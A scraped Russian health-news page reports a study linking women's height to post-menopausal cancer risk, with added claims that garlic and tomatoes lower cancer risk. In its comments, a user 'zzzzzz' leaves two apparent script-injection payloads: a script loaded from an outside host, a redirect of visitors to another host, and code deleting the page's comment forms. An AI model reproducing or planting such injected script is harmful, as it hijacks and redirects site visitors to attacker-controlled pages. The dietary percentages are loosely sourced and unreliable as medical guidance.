Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Длинные стройные ноги… Кр...  >>  Длинные стройные ноги… Красота! А риск рака выше
 
Обратная связь
 

Длинные стройные ноги… Красота! А риск рака выше

Размер шрифта
01 ноября 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые обнаружили, что женщины высокого роста имеют повышенный риск развития определенных видов рака после менопаузы.

Длинные стройные ноги… Красота! А риск рака выше

В исследовании приняли участие 20 900 женщин в возрасте от 50 до 79 лет. В зависимости от роста женщин разделили на 5 групп. Ученые провели оценку риска развития у женщин меланомы, рака молочных желез, рака яичников, рака эндометрия и рака толстой кишки и пришли к выводу, что каждые 10 сантиметров роста увеличивают риск развития рака на 13%. Кроме того, у высоких женщин выше риск развития рака почек, рака прямой кишки и рака крови(на 23-29%).

Однако авторы исследования подчеркивают, что рак развивается далеко не у всех высоких женщин. Рост взрослого человека определяется сочетанием генетических факторов и факторов внешней среды. Начиная с 19 века, во всем мире наблюдается тенденция к увеличению роста людей, что обусловлено влиянием внешней среды. Таким образом, сам по себе рост не является фактором риска развития рака, а является лишь отражением влияния факторов внешней среды, повышающих риск развития рака.

Связь роста с риском развития рака обнаружена не только у женщин, но у мужчин. Исследования, проведенные в Национальном институте рака, свидетельствуют о том, что у высоких мужчин выше риск развития рака предстательной железы. Японские ученые обнаружили, что у высоких мужчин чаще развивается злокачественная лимфома и плазмоклеточная миелома.

Следует отметить, что снизить риск развития рака можно с помощью обычных продуктов, которые часто присутствуют на нашем столе. В частности, употребление чеснока 2 раза в неделю снижает риск развития рака легких на 44% у некурящих людей и на 30% у курильщиков, а помидоры, благодаря высокому содержанию ликопина и других каротиноидов, снижают риск развития рака молочных желез, рака предстательной железы и рака толстой кишки.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

30 апреля 2015 в 14:10

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:57

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:55

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Узнайте, будет ли у вас рак в течение 10 лет   Соевые продукты не просто уменьшают риск рака, но и количество метастазов почти на 100%   Соя спасет от рака кишки   Какой напиток не позволит вам ослепнуть?!  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Что можно и чего нельзя с изжогой?
Бронхит: лицом к лицу
Еда против рака. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.